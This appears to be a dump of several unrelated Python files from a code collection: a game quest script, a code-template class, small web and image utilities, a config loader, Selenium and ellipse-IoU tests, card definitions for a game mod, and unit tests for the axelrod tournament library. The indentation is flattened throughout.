21535: [12,SHINING_MEDALLION],
21536: [12,SHINING_MEDALLION],
21537: [12,SHINING_MEDALLION],
21538: [12,SHINING_MEDALLION],
21539: [12,SHINING_MEDALLION],
21540: [12,SHINING_MEDALLION],
21541: [12,SHINING_MEDALLION]
}
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.katenar = self.harkil = 0
self.questItemId = [BLACK_ECHO_CRYSTAL, SHINING_MEDALLION]
def onEvent (self,event,st) :
if event == "1" : #Go talk to the wizard!
st.setState(STARTED)
st.set("cond","1")
st.playSound("ItemSound.quest_accept")
htmltext = "32138_02b.htm"
elif event == "1_yes" : #Ok, know about those Stakato Drones?
htmltext = "31522_01c.htm"
elif event == "1_no" : #You suck. Come back when you want to talk
htmltext = "31522_01no.htm"
elif event == "2" : #Get me the crystal
st.set("cond","2")
htmltext = "31522_02.htm"
elif event == "31522_03b" :
st.takeItems(BLACK_ECHO_CRYSTAL,-1)
htmltext = event + ".htm"
elif event == "4" : #Time to summon this bad boy
st.set("cond","4")
if not self.katenar :
st.addSpawn(KATENAR,120000)
self.katenar = 1
st.startQuestTimer("Despawn_Katenar",120000)
return
elif event == "5" : #gotta go. talk to Harkilgamed
st.set("cond","5")
htmltext = "32235_02.htm"
elif event == "spawn_harkil" : #talk to the rock, this spawns Harkilgamed
if not self.harkil :
st.addSpawn(HARKILGAMED,120000)
self.hark = 1
st.startQuestTimer("Despawn_Harkil",120000)
return
elif event == "6" : #now go hunt splendor mobs
st.set("cond","12")
htmltext = "32236_06.htm"
elif event == "8" : #go back to Kekropus
st.set("cond","14")
htmltext = "32236_08.htm"
elif event == "9" : #Go talk to Mao, no not the dictator Mao... the Vice Hierarch Mao. <_<
st.set("cond","15")
htmltext = "32138_09.htm"
elif event == "10" : #This is where you can find Rodenpicula.
st.set("cond","16")
st.getPlayer().teleToLocation(-119534,87176,-12593)
htmltext = "32190_02.htm"
elif event == "11" : #Go talk to Mother Nornil now
st.set("cond","17")
htmltext = "32237_11.htm"
elif event == "12" : #Get Rodenpicula's permission
st.set("cond","18")
htmltext = "32239_12.htm"
elif event == "13" : #LETS DO THIS!!
st.set("cond","19")
htmltext = "32237_13.htm"
elif event == "14" : #LEROOY JENKINS!!!! Finish the quest at Rodenpicula
st.set("cond","20")
htmltext = "32239_14.htm"
elif event == "15" : #done done done!!!
st.giveItems(SCROLL_ENCHANT_WEAPON_A,1)
st.setState(COMPLETED)
htmltext = "32237_15.htm"
elif event == "Despawn_Katenar" :
self.katenar = 0
return
elif event == "Despawn_Harkil" :
self.harkil = 0
return
else :
htmltext = event + ".htm" #this is for having to go through pages upon pages of html text... <_<
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
cond = st.getInt("cond")
if npcId == KEKROPUS :
if id == CREATED :
st.set("cond","0")
if player.getRace() != Race.Kamael :
st.exitQuest(1)
htmltext = "<html><body>I'm sorry, but I can only give this quest to Kamael. Talk to Magister Ladd.</body></html>"
elif player.getLevel() < 75 :
st.exitQuest(1)
htmltext = "32138_01.htm" #not qualified
elif not st.getQuestItemsCount(STAR_OF_DESTINY) :
st.exitQuest(1)
htmltext = "32138_01a.htm" #not qualified
else :
htmltext = "32138_02.htm" # Successful start: Talk to me a few times,
elif id == STARTED :
if cond < 14 :
htmltext = "32138_02c.htm"
elif cond == 14:
htmltext = "32138_08.htm"
else :
htmltext = "<html><body>Kekropus:<br>Go talk to Rodenpicula. Mao can help you get to her.</body></html>"
elif id == COMPLETED :
htmltext = "<html><body>You have already completed this quest.</body></html>"
elif npcId == WIZARD and id == STARTED:
# first time talking to Wizard. Talk a bit
if cond==1 :
htmltext = "31522_01.htm"
# Why are you back alraedy? You don't have the echo crystal
elif cond==2 :
htmltext = "31522_02a.htm" # you haven't gotten the crystal yet?
# aha! Here is the black echo crystal! Now where's that one chap?
elif cond == 3 or (cond == 4 and not self.katenar) :
htmltext = "31522_03.htm" # ah yes. Now you get to talk to this guy that I will soon summon
else :
htmltext = "31522_04.htm" #shouldn't you be talking to Katenar?
elif npcId == KATENAR and id == STARTED:
if cond == 4:
htmltext = "32235_01.htm"
elif cond >= 5:
htmltext = "32235_02.htm"
elif npcId == ROCK and id == STARTED:
if cond == 5 or cond == 13:
htmltext = "32238.htm" #click the link to spawn Harkilgamed
else:
htmltext = "<html><body>A strange rock...</body></html>"
elif npcId == HARKILGAMED and id == STARTED:
if cond == 5:
htmltext = "32236_05.htm" #First time talking to Harkilgamed
elif cond == 12:
htmltext = "32236_06.htm" #Kill the Splendor mobs, bring back 62 Shining Medallions
elif cond == 13:
st.takeItems(SHINING_MEDALLION,-1)
htmltext = "32236_07.htm"
elif cond > 13:
htmltext = "<html><body>Harkilgamed:<br><br>Go talk to Kekropus already.</body></html>"
elif npcId == MAO and id == STARTED: #Ok. The deal with Mao is that he's supposed to port you to Mother Nornil, but since she's not yet in the spawnlist, he's just gonna tell ya where to find her.
#THIS MEANS: WHOEVER SPAWNS NORNIL AND RODENPICULA MUST WRITE THE FOLLOWING .htm FILE ACCORDINGLY
if cond == 15 or cond == 16:
htmltext = "32190_01.htm"
elif npcId == RODENPICULA and id==STARTED:
if cond == 16:
htmltext = "32237_10.htm" #heys. long talk, figure stuff out
elif cond == 17:
htmltext = "32237_11.htm" #talk to nornil already
elif cond == 18:
htmltext = "32237_12.htm" #you want approval
elif cond == 19:
htmltext = "32237_13.htm" #here's approval, talk to her
elif cond == 20:
htmltext = "32237_14.htm" #congrats. here's a scroll
elif npcId == NORNIL and id==STARTED:
if cond == 17:
htmltext = "32239_11.htm" #yo. get rodenpicula's approval
elif cond == 18:
htmltext = "32239_12.htm" #i need rodenpicula's approval
elif cond == 19:
htmltext = "32239_13.htm" #lets get it over with
elif cond == 20:
htmltext = "32239_14.htm" #you're good. talk to roden one more time
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
#The following algorithm should work for both quest mobs and drops for this quest.... hopefully.
npcId = npc.getNpcId()
dropcond, item = DROPLIST[npcId]
drop = st.getRandom(100)
cond = st.getInt("cond")
if drop < DROP_RATE and cond == dropcond :
if st.getQuestItemsCount(item) < NEEDED[item] :
st.giveItems(item,1)
st.playSound("ItemSound.quest_itemget")
if st.getQuestItemsCount(item) == NEEDED[item]:
st.set("cond",str(cond+1))
return
QUEST = Quest(236,qn,"Seeds of Chaos")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(KEKROPUS)
QUEST.addTalkId(KEKROPUS)
QUEST.addTalkId(WIZARD)
QUEST.addTalkId(KATENAR)
QUEST.addTalkId(ROCK)
QUEST.addTalkId(HARKILGAMED)
QUEST.addTalkId(MAO)
QUEST.addTalkId(RODENPICULA)
QUEST.addTalkId(NORNIL)
for i in DROPLIST.keys():
QUEST.addKillId(i)
|
py | 1a40d7237b5d579bb514ba03c63899672851fff1 | # -*- coding: utf-8 -*-
from os.path import join
from os.path import dirname
from os.path import isfile
class Template(object):
SUPPORTED_METHODS = {}
TEMPLATES = {}
def __init__(self, estimator, target_language='java',
target_method='predict', **kwargs):
# pylint: disable=unused-argument
self.target_language = str(target_language)
self.target_method = str(target_method)
# Default settings:
self.class_name = 'Brain'
self.method_name = 'predict'
self._num_format = lambda x: str(x)
self.use_file = False
def indent(self, text, n_indents=1, skipping=False):
"""
Indent text with single spaces.
Parameters
----------
:param text : string
The text which get a specific indentation.
:param n_indents : int, default: 1
The number of indentations.
:param skipping : boolean, default: False
Whether to skip the initial indentation.
Returns
-------
return : string
The indented text.
"""
lines = text.splitlines()
space = self.TEMPLATES.get(self.target_language).get('indent', ' ')
# Single line:
if len(lines) == 1:
if skipping:
return text.strip()
return n_indents * space + text.strip()
# Multiple lines:
indented_lines = []
for idx, line in enumerate(lines):
if skipping and idx is 0:
indented_lines.append(line)
else:
line = n_indents * space + line
indented_lines.append(line)
indented_text = '\n'.join(indented_lines)
return indented_text
def temp(self, name, templates=None, n_indents=None, skipping=False):
"""
Get specific template of chosen
programming language.
Parameters
----------
:param param name : string
The key name of the template.
:param param templates : string, default: None
The template with placeholders.
:param param n_indents : int, default: None
The number of indentations.
:param param skipping : bool, default: False
Whether to skip the initial indentation.
Returns
-------
return : string
The wanted template string.
"""
if templates is None:
templates = self.TEMPLATES.get(self.target_language)
keys = name.split('.')
key = keys.pop(0).lower()
template = templates.get(key, None)
if template is not None:
if isinstance(template, str):
if n_indents is not None:
template = self.indent(template, n_indents, skipping)
return template
else:
keys = '.'.join(keys)
return self.temp(keys, template, skipping=False)
else:
class_name = self.__class__.__name__
estimator_type = getattr(self, 'estimator_type') if \
hasattr(self, 'estimator_type') else 'classifier'
path = join(dirname(__file__), 'estimator',
estimator_type, class_name, 'templates',
self.target_language, name + '.txt')
if isfile(path):
with open(path, 'r') as file_:
template = file_.read()
if n_indents is not None:
template = self.indent(template, n_indents, skipping)
return template
else:
err = "Template '{}' wasn't found.".format(name)
raise AttributeError(err)
def repr(self, value):
return self._num_format(value)
def data(self, dict_):
copy = self.__dict__.copy()
copy.update(dict_) # update and extend dictionary
return copy
|
py | 1a40d776a207ee64f4fb3f6a2d28457afc60e826 | import webapp2
class SliderWS(webapp2.RequestHandler):
def get(self):
self.response.headers["Content-Type"]="application/json"
sliderData="""[{image : '_include/img/slider-images/image01.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image02.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image03.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''},
{image : '_include/img/slider-images/image04.jpg', title : '<div class="slide-content">Brushed</div>', thumb : '', url : ''}
]"""
self.response.out.write(sliderData) |
py | 1a40d7873baa893d72050b9aee597e0bf3d3cd9c | #! /usr/bin/env python
import numpy as np
import sys
sys.path.append("spnet/")
sys.path.append("../spnet/")
from diagnostics import compute_iou
def test_compute_iou():
# make up two ellipes
Y_true = (100, 140, 120, 60, 90, 0, 10.3) # ellipse a
Y_pred = (120, 123, 120, 60, 149.97, 0, 7.8) # ellips b
#iou = evaluate_spnet.compute_iou(Y_true, Y_pred)
iou = compute_iou(Y_true, Y_pred)
np.testing.assert_equal(iou, 0.44227983107795693) # force an assertion for the test
return iou
if __name__ == '__main__':
# current setup: testing a couple pre-defined ellipses
iou = test_compute_iou()
print("IOU score = ",iou)
|
py | 1a40d8ffc6121c8f24359d9de050ec6e9b14469e | from engi_mod import *
Card(
name = "Death Ray",
# comparison to Bludgeon:
# - exhausts
# - doesn't kill attacking enemies immediately
# - overkills small enemies, requiring another source of Vulnerable to make Death Pulse free
# - bad against Artifact
# - Time Eater stacks
# + always Vulnerable
type = "skill",
target = "enemy",
rarity = "rare",
cost = 3,
const = dict(
VULNER_STACKS = 6,
PULSE_NUM = 2,
),
flags = dict(
exhaust = "true",
),
desc = "Apply 6 Vulnerable. NL Shuffle 2 Death Pulses into your draw pile. Exhaust.",
upgrade_desc = "Apply 8 Vulnerable. NL Shuffle 3 Death Pulses into your draw pile. Exhaust.",
code = """
int stacks = VULNER_STACKS;
int cards = PULSE_NUM;
if (upgraded) {
stacks += 2;
cards += 1;
}
AbstractDungeon.actionManager.addToBottom(
new ApplyPowerAction(m, p, new VulnerablePower(m, stacks, false), stacks)
);
AbstractDungeon.actionManager.addToBottom(
new MakeTempCardInDrawPileAction(p, p, new DeathPulse(), cards, true, true)
);
""",
upgrade_code = """
upgradeName();
rawDescription = UPGRADE_DESCRIPTION;
initializeDescription();
"""
)
Card(
name = "Death Pulse",
type = "attack",
target = "enemy",
rarity = "special",
cost = 2,
const = dict(
DAMAGE = 14,
DAMAGE_UPGRADE = 6,
),
flags = dict(
exhaust = "true",
),
desc = "Deal !D! damage. If the target is Vulnerable, gain [R] [R] and draw 1 card. Exhaust.",
code = """
AbstractDungeon.actionManager.addToBottom(
new DeathPulseAction(m)
);
AbstractDungeon.actionManager.addToBottom(
new DamageAction(m, new DamageInfo(p, damage, damageTypeForTurn), AbstractGameAction.AttackEffect.BLUNT_HEAVY)
);
""",
upgrade_code_FULL = """
upgradeName();
upgradeDamage(DAMAGE_UPGRADE);
"""
)
Action(
id = "DeathPulseAction",
args = """
AbstractCreature target
""",
flags = dict(
duration = "Settings.ACTION_DUR_XFAST",
actionType = "ActionType.BLOCK",
),
code = """
if (target != null && target.hasPower("Vulnerable")) {
AbstractDungeon.actionManager.addToTop(new DrawCardAction(AbstractDungeon.player, 1));
AbstractDungeon.actionManager.addToTop(new GainEnergyAction(2));
}
isDone = true;
""",
)
|
py | 1a40d939d502195e456e52a339c85a55cfceb9d5 | import logging
import os
import unittest
home_dir = os.getenv('HOME')
logging.basicConfig(level = logging.DEBUG)
from selenium import webdriver
class BrowserTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
p = webdriver.FirefoxProfile()
p.set_preference('webdriver.log.file', home_dir + '/firefox_console')
cls.browser = webdriver.Firefox(p)
cls.browser.implicitly_wait(30)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
"""Start a new browser session, and schedule the browser to be shutdown"""
self.browser = self.__class__.browser
self.browser.delete_all_cookies()
def elem(self, selector):
"""Alias for self.browser.find_element_by_css_selector"""
return self.browser.find_element_by_css_selector(selector)
def elems(self, selector):
"""Alias for self.browser.find_elements_by_css_selector"""
return self.browser.find_elements_by_css_selector(selector)
def findLink(self, name):
"""Alias for self.browser.find_element_by_link_text"""
return self.browser.find_element_by_link_text(name)
|
py | 1a40d9427c5a2d0bb22a328e2999cbd85b27b377 | from PIL.Image import Image
def noop(image: Image) -> Image:
"""
Dummy processor.
It does nothing and returns the same image.
:param image: input image
:return: same image
"""
return image
|
py | 1a40d94ccce67a66a2bb8c60f252799bea464823 | from app.helpers.cache import CacheExpiresAfter
from app.helpers.units import Units
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
def handle_cache_expires_after():
try:
if CacheExpiresAfter(config["cache"]["cache_expires_after"]) is CacheExpiresAfter.DISABLE:
return CacheExpiresAfter.DISABLE
if CacheExpiresAfter(config["cache"]["cache_expires_after"]) is CacheExpiresAfter.TODAY:
return CacheExpiresAfter.TODAY
except:
return int(config["cache"]["cache_expires_after"])
class BaseConfigError(Exception):
pass
class BaseConfig:
OPEN_WEATHER_MAP_API_KEY = config["api"]["open_weather_map_key"]
LATITUDE = config["general"]["latitude"]
LONGITUDE = config["general"]["longitude"]
CACHE_EXPIRES_AFTER = handle_cache_expires_after()
DEFAULT_BASE_UNITS = Units.METRIC
BASE_UNITS = DEFAULT_BASE_UNITS if config["general"]["base_units"] is None else Units(
config["general"]["base_units"])
DEFAULT_LANGUAGE = "en"
LANGUAGE = DEFAULT_LANGUAGE if config["general"]["language"] is None else config["general"]["language"]
MEMCACHED_SERVER = config["cache"]["memcached"]
if BaseConfig.OPEN_WEATHER_MAP_API_KEY is None:
raise BaseConfigError("OPEN_WEATHER_MAP_API_KEY is missing")
|
py | 1a40da703cf53178c6c31a759bb4f1508f0dafaa | """Tests for the main tournament class."""
import csv
import logging
from multiprocessing import Queue, cpu_count
import unittest
import warnings
from hypothesis import given, example, settings
from hypothesis.strategies import integers, floats
from axelrod.tests.property import (tournaments,
prob_end_tournaments,
spatial_tournaments,
strategy_lists)
import axelrod
try:
# Python 3
from unittest.mock import MagicMock
except ImportError:
# Python 2
from mock import MagicMock
test_strategies = [axelrod.Cooperator,
axelrod.TitForTat,
axelrod.Defector,
axelrod.Grudger,
axelrod.GoByMajority]
test_repetitions = 5
test_turns = 100
test_prob_end = .5
test_edges = [(0, 1), (1, 2), (3, 4)]
deterministic_strategies = [s for s in axelrod.strategies
if not s().classifier['stochastic']]
class TestTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
cls.players = [s() for s in test_strategies]
cls.test_name = 'test'
cls.test_repetitions = test_repetitions
cls.test_turns = test_turns
cls.expected_payoff = [
[600, 600, 0, 600, 600],
[600, 600, 199, 600, 600],
[1000, 204, 200, 204, 204],
[600, 600, 199, 600, 600],
[600, 600, 199, 600, 600]]
cls.expected_cooperation = [
[200, 200, 200, 200, 200],
[200, 200, 1, 200, 200],
[0, 0, 0, 0, 0],
[200, 200, 1, 200, 200],
[200, 200, 1, 200, 200]]
cls.filename = "test_outputs/test_tournament.csv"
def test_init(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=self.test_turns,
noise=0.2)
self.assertEqual(len(tournament.players), len(test_strategies))
self.assertIsInstance(
tournament.players[0].match_attributes['game'], axelrod.Game
)
self.assertEqual(tournament.game.score(('C', 'C')), (3, 3))
self.assertEqual(tournament.turns, self.test_turns)
self.assertEqual(tournament.repetitions, 10)
self.assertEqual(tournament.name, 'test')
self.assertTrue(tournament._with_morality)
self.assertIsInstance(tournament._logger, logging.Logger)
self.assertEqual(tournament.noise, 0.2)
anonymous_tournament = axelrod.Tournament(players=self.players)
self.assertEqual(anonymous_tournament.name, 'axelrod')
def test_warning(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=10,
repetitions=1)
with warnings.catch_warnings(record=True) as w:
# Check that a warning is raised if no results set is built and no
# filename given
results = tournament.play(build_results=False, progress_bar=False)
self.assertEqual(len(w), 1)
with warnings.catch_warnings(record=True) as w:
# Check that no warning is raised if no results set is built and a
# is filename given
tournament.play(build_results=False,
filename=self.filename, progress_bar=False)
self.assertEqual(len(w), 0)
def test_serial_play(self):
# Test that we get an instance of ResultSet
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Test that _run_serial_repetitions is called with empty matches list
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertEqual(tournament.num_interactions, 75)
def test_serial_play_with_different_game(self):
# Test that a non default game is passed to the result set
game = axelrod.Game(p=-1, r=-1, s=-1, t=-1)
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=game,
turns=1,
repetitions=1)
results = tournament.play(progress_bar=False)
self.assertEqual(results.game.RPST(), (-1, -1, -1, -1))
def test_no_progress_bar_play(self):
"""Test that progress bar is not created for progress_bar=False"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
# Test with build results
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Check that no progress bar was created
call_progress_bar = lambda: tournament.progress_bar.total
self.assertRaises(AttributeError, call_progress_bar)
# Test without build results
results = tournament.play(progress_bar=False, build_results=False,
filename=self.filename)
self.assertIsNone(results)
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertRaises(AttributeError, call_progress_bar)
def test_progress_bar_play(self):
"""Test that progress bar is created by default and with True argument"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play()
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
results = tournament.play(progress_bar=True)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
# Test without build results
results = tournament.play(progress_bar=True, build_results=False,
filename=self.filename)
self.assertIsNone(results)
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.progress_bar.total, 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_progress_bar_play_parallel(self):
"""Test that tournament plays when asking for progress bar for parallel
tournament"""
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(processes=2)
self.assertIsInstance(results, axelrod.ResultSet)
results = tournament.play(progress_bar=True)
self.assertIsInstance(results, axelrod.ResultSet)
@given(tournament=tournaments(min_size=2, max_size=5, min_turns=2,
max_turns=50, min_repetitions=2,
max_repetitions=4))
@settings(max_examples=50, timeout=0)
@example(tournament=axelrod.Tournament(players=[s() for s in
test_strategies], turns=test_turns, repetitions=test_repetitions)
)
# These two examples are to make sure #465 is fixed.
# As explained there: https://github.com/Axelrod-Python/Axelrod/issues/465,
# these two examples were identified by hypothesis.
@example(tournament=
axelrod.Tournament(players=[axelrod.BackStabber(),
axelrod.MindReader()],
turns=2, repetitions=1),
)
@example(tournament=
axelrod.Tournament(players=[axelrod.BackStabber(),
axelrod.ThueMorse()],
turns=2, repetitions=1),
)
def test_property_serial_play(self, tournament):
"""Test serial play using hypothesis"""
# Test that we get an instance of ResultSet
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(results.nplayers, len(tournament.players))
self.assertEqual(results.players, [str(p) for p in tournament.players])
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_parallel_play(self):
# Test that we get an instance of ResultSet
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(processes=2, progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
self.assertEqual(tournament.num_interactions, 75)
# The following relates to #516
players = [axelrod.Cooperator(), axelrod.Defector(),
axelrod.BackStabber(), axelrod.PSOGambler(),
axelrod.ThueMorse(), axelrod.DoubleCrosser()]
tournament = axelrod.Tournament(
name=self.test_name,
players=players,
game=self.game,
turns=20,
repetitions=self.test_repetitions)
scores = tournament.play(processes=2, progress_bar=False).scores
self.assertEqual(len(scores), len(players))
def test_run_serial(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament._run_serial())
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_run_parallel(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament._run_parallel())
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_n_workers(self):
max_processes = cpu_count()
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
self.assertEqual(tournament._n_workers(processes=1), max_processes)
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
self.assertEqual(tournament._n_workers(processes=max_processes+2),
max_processes)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
@unittest.skipIf(
cpu_count() < 2,
"not supported on single processor machines")
def test_2_workers(self):
# This is a separate test with a skip condition because we
# cannot guarantee that the tests will always run on a machine
# with more than one processor
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions,)
self.assertEqual(tournament._n_workers(processes=2), 2)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_start_workers(self):
workers = 2
work_queue = Queue()
done_queue = Queue()
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
chunks = tournament.match_generator.build_match_chunks()
for chunk in chunks:
work_queue.put(chunk)
tournament._start_workers(workers, work_queue, done_queue)
stops = 0
while stops < workers:
payoffs = done_queue.get()
if payoffs == 'STOP':
stops += 1
self.assertEqual(stops, workers)
@unittest.skipIf(axelrod.on_windows,
"Parallel processing not supported on Windows")
def test_worker(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
work_queue = Queue()
chunks = tournament.match_generator.build_match_chunks()
count = 0
for chunk in chunks:
work_queue.put(chunk)
count += 1
work_queue.put('STOP')
done_queue = Queue()
tournament._worker(work_queue, done_queue)
for r in range(count):
new_matches = done_queue.get()
for index_pair, matches in new_matches.items():
self.assertIsInstance(index_pair, tuple)
self.assertEqual(len(matches), self.test_repetitions)
queue_stop = done_queue.get()
self.assertEqual(queue_stop, 'STOP')
def test_build_result_set(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(progress_bar=False)
self.assertIsInstance(results, axelrod.ResultSet)
# Test in memory
results = tournament.play(progress_bar=False, in_memory=True)
self.assertIsInstance(results, axelrod.ResultSet)
def test_no_build_result_set(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=200,
repetitions=self.test_repetitions)
results = tournament.play(build_results=False, filename=self.filename,
progress_bar=False)
self.assertIsNone(results)
# Checking that results were written properly
results = axelrod.ResultSetFromFile(self.filename)
self.assertIsInstance(results, axelrod.ResultSet)
@given(turns=integers(min_value=1, max_value=200))
@example(turns=3)
@example(turns=200)
def test_play_matches(self, turns):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
repetitions=self.test_repetitions)
def make_chunk_generator():
for player1_index in range(len(self.players)):
for player2_index in range(player1_index, len(self.players)):
index_pair = (player1_index, player2_index)
match_params = (turns, self.game, None, 0)
yield (index_pair, match_params, self.test_repetitions)
chunk_generator = make_chunk_generator()
interactions = {}
for chunk in chunk_generator:
result = tournament._play_matches(chunk)
for index_pair, inters in result.items():
try:
interactions[index_pair].append(inters)
except KeyError:
interactions[index_pair] = [inters]
self.assertEqual(len(interactions), 15)
for index_pair, inter in interactions.items():
self.assertEqual(len(index_pair), 2)
for plays in inter:
# Check that have the expected number of repetitions
self.assertEqual(len(plays), self.test_repetitions)
for repetition in plays:
# Check that have the correct length for each rep
self.assertEqual(len(repetition), turns)
# Check that matches no longer exist
self.assertEqual((len(list(chunk_generator))), 0)
def test_write_interactions(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=2,
repetitions=2)
tournament._write_interactions = MagicMock(
name='_write_interactions')
tournament._build_result_set = MagicMock(
name='_build_result_set') # Mocking this as it is called by play
self.assertTrue(tournament.play(filename=self.filename,
progress_bar=False))
tournament.outputfile.close() # This is normally closed by `build_result_set`
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
# Test when runnning in memory
tournament._write_interactions = MagicMock(
name='_write_interactions')
self.assertTrue(tournament.play(filename=self.filename,
progress_bar=False,
in_memory=True))
# Get the calls made to write_interactions
calls = tournament._write_interactions.call_args_list
self.assertEqual(len(calls), 15)
def test_write_to_csv(self):
tournament = axelrod.Tournament(
name=self.test_name,
players=self.players,
game=self.game,
turns=2,
repetitions=2)
tournament.play(filename=self.filename, progress_bar=False)
with open(self.filename, 'r') as f:
written_data = [[int(r[0]), int(r[1])] + r[2:] for r in csv.reader(f)]
expected_data = [[0, 1, 'Cooperator', 'Tit For Tat', 'CC', 'CC'],
[0, 1, 'Cooperator', 'Tit For Tat', 'CC', 'CC'],
[1, 2, 'Tit For Tat', 'Defector', 'CD', 'DD'],
[1, 2, 'Tit For Tat', 'Defector', 'CD', 'DD'],
[0, 0, 'Cooperator', 'Cooperator', 'CC', 'CC'],
[0, 0, 'Cooperator', 'Cooperator', 'CC', 'CC'],
[3, 3, 'Grudger', 'Grudger', 'CC', 'CC'],
[3, 3, 'Grudger', 'Grudger', 'CC', 'CC'],
[2, 2, 'Defector', 'Defector', 'DD', 'DD'],
[2, 2, 'Defector', 'Defector', 'DD', 'DD'],
[4, 4, 'Soft Go By Majority', 'Soft Go By Majority', 'CC', 'CC'],
[4, 4, 'Soft Go By Majority', 'Soft Go By Majority', 'CC', 'CC'],
[1, 4, 'Tit For Tat', 'Soft Go By Majority', 'CC', 'CC'],
[1, 4, 'Tit For Tat', 'Soft Go By Majority', 'CC', 'CC'],
[1, 1, 'Tit For Tat', 'Tit For Tat', 'CC', 'CC'],
[1, 1, 'Tit For Tat', 'Tit For Tat', 'CC', 'CC'],
[1, 3, 'Tit For Tat', 'Grudger', 'CC', 'CC'],
[1, 3, 'Tit For Tat', 'Grudger', 'CC', 'CC'],
[2, 3, 'Defector', 'Grudger', 'DD', 'CD'],
[2, 3, 'Defector', 'Grudger', 'DD', 'CD'],
[0, 4, 'Cooperator', 'Soft Go By Majority', 'CC', 'CC'],
[0, 4, 'Cooperator', 'Soft Go By Majority', 'CC', 'CC'],
[2, 4, 'Defector', 'Soft Go By Majority', 'DD', 'CD'],
[2, 4, 'Defector', 'Soft Go By Majority', 'DD', 'CD'],
[0, 3, 'Cooperator', 'Grudger', 'CC', 'CC'],
[0, 3, 'Cooperator', 'Grudger', 'CC', 'CC'],
[3, 4, 'Grudger', 'Soft Go By Majority', 'CC', 'CC'],
[3, 4, 'Grudger', 'Soft Go By Majority', 'CC', 'CC'],
[0, 2, 'Cooperator', 'Defector', 'CC', 'DD'],
[0, 2, 'Cooperator', 'Defector', 'CC', 'DD']]
self.assertEqual(sorted(written_data), sorted(expected_data))
class TestProbEndTournament(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.game = axelrod.Game()
